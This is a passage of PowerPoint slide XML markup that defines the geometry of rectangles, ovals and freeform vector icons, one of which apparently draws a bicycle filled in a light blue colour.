                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11974239" y="6519368"/>
                  <a:ext cx="34212" cy="129517"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 28"/>
                    <a:gd name="T1" fmla="*/ 0 h 106"/>
                    <a:gd name="T2" fmla="*/ 28 w 28"/>
                    <a:gd name="T3" fmla="*/ 0 h 106"/>
                    <a:gd name="T4" fmla="*/ 28 w 28"/>
                    <a:gd name="T5" fmla="*/ 106 h 106"/>
                    <a:gd name="T6" fmla="*/ 0 w 28"/>
                    <a:gd name="T7" fmla="*/ 106 h 106"/>
                    <a:gd name="T8" fmla="*/ 0 w 28"/>
                    <a:gd name="T9" fmla="*/ 0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lnTo>
                        <a:pt x="28" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="106"/>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5" name="Oval 100"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11904594" y="6403291"/>
                  <a:ext cx="171060" cy="17350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6" name="Oval 101"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11927809" y="6314096"/>
                  <a:ext cx="124629" cy="12951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7" name="Rectangle 78"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4484278" y="6634222"/>
                  <a:ext cx="1139993" cy="67203"/>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8" name="Rectangle 77"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6155100" y="6634222"/>
                  <a:ext cx="1142438" cy="67204"/>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679" name="Rectangle 76"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8522022" y="6634222"/>
                  <a:ext cx="398325" cy="67204"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="587" name="Freeform 586"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="10755933" y="6646631"/>
                <a:ext cx="461492" cy="299403"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1443 w 1898"/>
                  <a:gd name="T1" fmla="*/ 464 h 1230"/>
                  <a:gd name="T2" fmla="*/ 1359 w 1898"/>
                  <a:gd name="T3" fmla="*/ 81 h 1230"/>
                  <a:gd name="T4" fmla="*/ 1177 w 1898"/>
                  <a:gd name="T5" fmla="*/ 47 h 1230"/>
                  <a:gd name="T6" fmla="*/ 1062 w 1898"/>
                  <a:gd name="T7" fmla="*/ 17 h 1230"/>
                  <a:gd name="T8" fmla="*/ 1171 w 1898"/>
                  <a:gd name="T9" fmla="*/ 135 h 1230"/>
                  <a:gd name="T10" fmla="*/ 1280 w 1898"/>
                  <a:gd name="T11" fmla="*/ 135 h 1230"/>
                  <a:gd name="T12" fmla="*/ 675 w 1898"/>
                  <a:gd name="T13" fmla="*/ 278 h 1230"/>
                  <a:gd name="T14" fmla="*/ 655 w 1898"/>
                  <a:gd name="T15" fmla="*/ 200 h 1230"/>
                  <a:gd name="T16" fmla="*/ 717 w 1898"/>
                  <a:gd name="T17" fmla="*/ 135 h 1230"/>
                  <a:gd name="T18" fmla="*/ 652 w 1898"/>
                  <a:gd name="T19" fmla="*/ 70 h 1230"/>
                  <a:gd name="T20" fmla="*/ 445 w 1898"/>
                  <a:gd name="T21" fmla="*/ 71 h 1230"/>
                  <a:gd name="T22" fmla="*/ 446 w 1898"/>
                  <a:gd name="T23" fmla="*/ 215 h 1230"/>
                  <a:gd name="T24" fmla="*/ 454 w 1898"/>
                  <a:gd name="T25" fmla="*/ 216 h 1230"/>
                  <a:gd name="T26" fmla="*/ 458 w 1898"/>
                  <a:gd name="T27" fmla="*/ 216 h 1230"/>
                  <a:gd name="T28" fmla="*/ 603 w 1898"/>
                  <a:gd name="T29" fmla="*/ 331 h 1230"/>
                  <a:gd name="T30" fmla="*/ 386 w 1898"/>
                  <a:gd name="T31" fmla="*/ 458 h 1230"/>
                  <a:gd name="T32" fmla="*/ 386 w 1898"/>
                  <a:gd name="T33" fmla="*/ 1230 h 1230"/>
                  <a:gd name="T34" fmla="*/ 911 w 1898"/>
                  <a:gd name="T35" fmla="*/ 885 h 1230"/>
                  <a:gd name="T36" fmla="*/ 911 w 1898"/>
                  <a:gd name="T37" fmla="*/ 885 h 1230"/>
                  <a:gd name="T38" fmla="*/ 921 w 1898"/>
                  <a:gd name="T39" fmla="*/ 883 h 1230"/>
                  <a:gd name="T40" fmla="*/ 931 w 1898"/>
                  <a:gd name="T41" fmla="*/ 880 h 1230"/>
                  <a:gd name="T42" fmla="*/ 935 w 1898"/>
                  <a:gd name="T43" fmla="*/ 877 h 1230"/>
                  <a:gd name="T44" fmla="*/ 943 w 1898"/>
                  <a:gd name="T45" fmla="*/ 870 h 1230"/>
                  <a:gd name="T46" fmla="*/ 945 w 1898"/>
                  <a:gd name="T47" fmla="*/ 869 h 1230"/>
                  <a:gd name="T48" fmla="*/ 1341 w 1898"/>
                  <a:gd name="T49" fmla="*/ 411 h 1230"/>
                  <a:gd name="T50" fmla="*/ 1358 w 1898"/>
                  <a:gd name="T51" fmla="*/ 486 h 1230"/>
                  <a:gd name="T52" fmla="*/ 1126 w 1898"/>
                  <a:gd name="T53" fmla="*/ 844 h 1230"/>
                  <a:gd name="T54" fmla="*/ 1898 w 1898"/>
                  <a:gd name="T55" fmla="*/ 844 h 1230"/>
                  <a:gd name="T56" fmla="*/ 652 w 1898"/>
                  <a:gd name="T57" fmla="*/ 428 h 1230"/>
                  <a:gd name="T58" fmla="*/ 769 w 1898"/>
                  <a:gd name="T59" fmla="*/ 797 h 1230"/>
                  <a:gd name="T60" fmla="*/ 652 w 1898"/>
                  <a:gd name="T61" fmla="*/ 428 h 1230"/>
                  <a:gd name="T62" fmla="*/ 459 w 1898"/>
                  <a:gd name="T63" fmla="*/ 799 h 1230"/>
                  <a:gd name="T64" fmla="*/ 679 w 1898"/>
                  <a:gd name="T65" fmla="*/ 798 h 1230"/>
                  <a:gd name="T66" fmla="*/ 88 w 1898"/>
                  <a:gd name="T67" fmla="*/ 844 h 1230"/>
                  <a:gd name="T68" fmla="*/ 483 w 1898"/>
                  <a:gd name="T69" fmla="*/ 563 h 1230"/>
                  <a:gd name="T70" fmla="*/ 348 w 1898"/>
                  <a:gd name="T71" fmla="*/ 867 h 1230"/>
                  <a:gd name="T72" fmla="*/ 386 w 1898"/>
                  <a:gd name="T73" fmla="*/ 888 h 1230"/>
                  <a:gd name="T74" fmla="*/ 386 w 1898"/>
                  <a:gd name="T75" fmla="*/ 1142 h 1230"/>
                  <a:gd name="T76" fmla="*/ 720 w 1898"/>
                  <a:gd name="T77" fmla="*/ 366 h 1230"/>
                  <a:gd name="T78" fmla="*/ 921 w 1898"/>
                  <a:gd name="T79" fmla="*/ 762 h 1230"/>
                  <a:gd name="T80" fmla="*/ 1214 w 1898"/>
                  <a:gd name="T81" fmla="*/ 844 h 1230"/>
                  <a:gd name="T82" fmla="*/ 1470 w 1898"/>
                  <a:gd name="T83" fmla="*/ 857 h 1230"/>
                  <a:gd name="T84" fmla="*/ 1525 w 1898"/>
                  <a:gd name="T85" fmla="*/ 886 h 1230"/>
                  <a:gd name="T86" fmla="*/ 1554 w 1898"/>
                  <a:gd name="T87" fmla="*/ 831 h 1230"/>
                  <a:gd name="T88" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T89" fmla="*/ 546 h 1230"/>
                  <a:gd name="T90" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T91" fmla="*/ 11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8" h="1230">
                    <a:moveTo>
                      <a:pt x="1512" y="458"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1489" y="458"/>
                      <a:pt x="1466" y="460"/>
                      <a:pt x="1443" y="464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1354" y="61"/>
                      <a:pt x="1336" y="47"/>
                      <a:pt x="1315" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1171" y="46"/>
                      <a:pt x="1147" y="41"/>
                      <a:pt x="1124" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1107" y="0"/>
                      <a:pt x="1079" y="0"/>
                      <a:pt x="1062" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1045" y="35"/>
                      <a:pt x="1045" y="63"/>
                      <a:pt x="1062" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1112" y="130"/>
                      <a:pt x="1165" y="134"/>
                      <a:pt x="1171" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="656" y="200"/>
                      <a:pt x="657" y="200"/>
                      <a:pt x="658" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="691" y="196"/>
                      <a:pt x="717" y="169"/>
                      <a:pt x="717" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="717" y="102"/>
                      <a:pt x="692" y="75"/>
                      <a:pt x="660" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="658" y="70"/>
                      <a:pt x="655" y="70"/>
                      <a:pt x="652" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="70"/>
                      <a:pt x="448" y="70"/>
                      <a:pt x="445" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="75"/>
                      <a:pt x="381" y="106"/>
                      <a:pt x="381" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="181"/>
                      <a:pt x="409" y="211"/>
                      <a:pt x="446" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="448" y="216"/>
                      <a:pt x="451" y="216"/>
                      <a:pt x="453" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="455" y="216"/>
                      <a:pt x="457" y="216"/>
                      <a:pt x="458" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="481" y="467"/>
                      <a:pt x="434" y="458"/>
                      <a:pt x="386" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="458"/>
                      <a:pt x="0" y="631"/>
                      <a:pt x="0" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1057"/>
                      <a:pt x="173" y="1230"/>
                      <a:pt x="386" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="1230"/>
                      <a:pt x="749" y="1079"/>
                      <a:pt x="769" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="915" y="884"/>
                      <a:pt x="918" y="884"/>
                      <a:pt x="921" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="922" y="883"/>
                      <a:pt x="923" y="883"/>
                      <a:pt x="924" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="926" y="882"/>
                      <a:pt x="928" y="881"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="879"/>
                      <a:pt x="934" y="878"/>
                      <a:pt x="935" y="877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="877"/>
                      <a:pt x="937" y="876"/>
                      <a:pt x="938" y="875"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="874"/>
                      <a:pt x="942" y="872"/>
                      <a:pt x="943" y="870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="944" y="870"/>
                      <a:pt x="944" y="870"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1222" y="549"/>
                      <a:pt x="1126" y="685"/>
                      <a:pt x="1126" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126" y="1057"/>
                      <a:pt x="1299" y="1230"/>
                      <a:pt x="1512" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1725" y="1230"/>
                      <a:pt x="1898" y="1057"/>
                      <a:pt x="1898" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1898" y="631"/>
                      <a:pt x="1725" y="458"/>
                      <a:pt x="1512" y="458"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="652" y="428"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="755" y="684"/>
                      <a:pt x="692" y="586"/>
                      <a:pt x="602" y="525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="652" y="428"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="679" y="798"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="649"/>
                      <a:pt x="667" y="718"/>
                      <a:pt x="679" y="798"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="386" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="1141"/>
                      <a:pt x="88" y="1008"/>
                      <a:pt x="88" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="680"/>
                      <a:pt x="221" y="547"/>
                      <a:pt x="386" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="547"/>
                      <a:pt x="452" y="553"/>
                      <a:pt x="483" y="563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="837"/>
                      <a:pt x="340" y="854"/>
                      <a:pt x="348" y="867"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="880"/>
                      <a:pt x="371" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="1030"/>
                      <a:pt x="536" y="1141"/>
                      <a:pt x="386" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="921" y="762"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="921" y="762"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1512" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1348" y="1141"/>
                      <a:pt x="1215" y="1008"/>
                      <a:pt x="1214" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1215" y="725"/>
                      <a:pt x="1284" y="623"/>
                      <a:pt x="1385" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1476" y="876"/>
                      <a:pt x="1493" y="888"/>
                      <a:pt x="1512" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1516" y="888"/>
                      <a:pt x="1521" y="888"/>
                      <a:pt x="1525" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1548" y="879"/>
                      <a:pt x="1561" y="855"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1483" y="548"/>
                      <a:pt x="1497" y="547"/>
                      <a:pt x="1512" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1676" y="547"/>
                      <a:pt x="1809" y="680"/>
                      <a:pt x="1810" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1809" y="1008"/>
                      <a:pt x="1676" y="1141"/>
                      <a:pt x="1512" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00BCF2"/>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88" name="Freeform 587"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="8781898" y="6646632"/>
                <a:ext cx="461492" cy="299404"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1443 w 1898"/>
                  <a:gd name="T1" fmla="*/ 464 h 1230"/>
                  <a:gd name="T2" fmla="*/ 1359 w 1898"/>
                  <a:gd name="T3" fmla="*/ 81 h 1230"/>
                  <a:gd name="T4" fmla="*/ 1177 w 1898"/>
                  <a:gd name="T5" fmla="*/ 47 h 1230"/>
                  <a:gd name="T6" fmla="*/ 1062 w 1898"/>
                  <a:gd name="T7" fmla="*/ 17 h 1230"/>
                  <a:gd name="T8" fmla="*/ 1171 w 1898"/>
                  <a:gd name="T9" fmla="*/ 135 h 1230"/>
                  <a:gd name="T10" fmla="*/ 1280 w 1898"/>
                  <a:gd name="T11" fmla="*/ 135 h 1230"/>
                  <a:gd name="T12" fmla="*/ 675 w 1898"/>
                  <a:gd name="T13" fmla="*/ 278 h 1230"/>
                  <a:gd name="T14" fmla="*/ 655 w 1898"/>
                  <a:gd name="T15" fmla="*/ 200 h 1230"/>
                  <a:gd name="T16" fmla="*/ 717 w 1898"/>
                  <a:gd name="T17" fmla="*/ 135 h 1230"/>
                  <a:gd name="T18" fmla="*/ 652 w 1898"/>
                  <a:gd name="T19" fmla="*/ 70 h 1230"/>
                  <a:gd name="T20" fmla="*/ 445 w 1898"/>
                  <a:gd name="T21" fmla="*/ 71 h 1230"/>
                  <a:gd name="T22" fmla="*/ 446 w 1898"/>
                  <a:gd name="T23" fmla="*/ 215 h 1230"/>
                  <a:gd name="T24" fmla="*/ 454 w 1898"/>
                  <a:gd name="T25" fmla="*/ 216 h 1230"/>
                  <a:gd name="T26" fmla="*/ 458 w 1898"/>
                  <a:gd name="T27" fmla="*/ 216 h 1230"/>
                  <a:gd name="T28" fmla="*/ 603 w 1898"/>
                  <a:gd name="T29" fmla="*/ 331 h 1230"/>
                  <a:gd name="T30" fmla="*/ 386 w 1898"/>
                  <a:gd name="T31" fmla="*/ 458 h 1230"/>
                  <a:gd name="T32" fmla="*/ 386 w 1898"/>
                  <a:gd name="T33" fmla="*/ 1230 h 1230"/>
                  <a:gd name="T34" fmla="*/ 911 w 1898"/>
                  <a:gd name="T35" fmla="*/ 885 h 1230"/>
                  <a:gd name="T36" fmla="*/ 911 w 1898"/>
                  <a:gd name="T37" fmla="*/ 885 h 1230"/>
                  <a:gd name="T38" fmla="*/ 921 w 1898"/>
                  <a:gd name="T39" fmla="*/ 883 h 1230"/>
                  <a:gd name="T40" fmla="*/ 931 w 1898"/>
                  <a:gd name="T41" fmla="*/ 880 h 1230"/>
                  <a:gd name="T42" fmla="*/ 935 w 1898"/>
                  <a:gd name="T43" fmla="*/ 877 h 1230"/>
                  <a:gd name="T44" fmla="*/ 943 w 1898"/>
                  <a:gd name="T45" fmla="*/ 870 h 1230"/>
                  <a:gd name="T46" fmla="*/ 945 w 1898"/>
                  <a:gd name="T47" fmla="*/ 869 h 1230"/>
                  <a:gd name="T48" fmla="*/ 1341 w 1898"/>
                  <a:gd name="T49" fmla="*/ 411 h 1230"/>
                  <a:gd name="T50" fmla="*/ 1358 w 1898"/>
                  <a:gd name="T51" fmla="*/ 486 h 1230"/>
                  <a:gd name="T52" fmla="*/ 1126 w 1898"/>
                  <a:gd name="T53" fmla="*/ 844 h 1230"/>
                  <a:gd name="T54" fmla="*/ 1898 w 1898"/>
                  <a:gd name="T55" fmla="*/ 844 h 1230"/>
                  <a:gd name="T56" fmla="*/ 652 w 1898"/>
                  <a:gd name="T57" fmla="*/ 428 h 1230"/>
                  <a:gd name="T58" fmla="*/ 769 w 1898"/>
                  <a:gd name="T59" fmla="*/ 797 h 1230"/>
                  <a:gd name="T60" fmla="*/ 652 w 1898"/>
                  <a:gd name="T61" fmla="*/ 428 h 1230"/>
                  <a:gd name="T62" fmla="*/ 459 w 1898"/>
                  <a:gd name="T63" fmla="*/ 799 h 1230"/>
                  <a:gd name="T64" fmla="*/ 679 w 1898"/>
                  <a:gd name="T65" fmla="*/ 798 h 1230"/>
                  <a:gd name="T66" fmla="*/ 88 w 1898"/>
                  <a:gd name="T67" fmla="*/ 844 h 1230"/>
                  <a:gd name="T68" fmla="*/ 483 w 1898"/>
                  <a:gd name="T69" fmla="*/ 563 h 1230"/>
                  <a:gd name="T70" fmla="*/ 348 w 1898"/>
                  <a:gd name="T71" fmla="*/ 867 h 1230"/>
                  <a:gd name="T72" fmla="*/ 386 w 1898"/>
                  <a:gd name="T73" fmla="*/ 888 h 1230"/>
                  <a:gd name="T74" fmla="*/ 386 w 1898"/>
                  <a:gd name="T75" fmla="*/ 1142 h 1230"/>
                  <a:gd name="T76" fmla="*/ 720 w 1898"/>
                  <a:gd name="T77" fmla="*/ 366 h 1230"/>
                  <a:gd name="T78" fmla="*/ 921 w 1898"/>
                  <a:gd name="T79" fmla="*/ 762 h 1230"/>
                  <a:gd name="T80" fmla="*/ 1214 w 1898"/>
                  <a:gd name="T81" fmla="*/ 844 h 1230"/>
                  <a:gd name="T82" fmla="*/ 1470 w 1898"/>
                  <a:gd name="T83" fmla="*/ 857 h 1230"/>
                  <a:gd name="T84" fmla="*/ 1525 w 1898"/>
                  <a:gd name="T85" fmla="*/ 886 h 1230"/>
                  <a:gd name="T86" fmla="*/ 1554 w 1898"/>
                  <a:gd name="T87" fmla="*/ 831 h 1230"/>
                  <a:gd name="T88" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T89" fmla="*/ 546 h 1230"/>
                  <a:gd name="T90" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T91" fmla="*/ 11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8" h="1230">
                    <a:moveTo>
                      <a:pt x="1512" y="458"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1489" y="458"/>
                      <a:pt x="1466" y="460"/>
                      <a:pt x="1443" y="464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
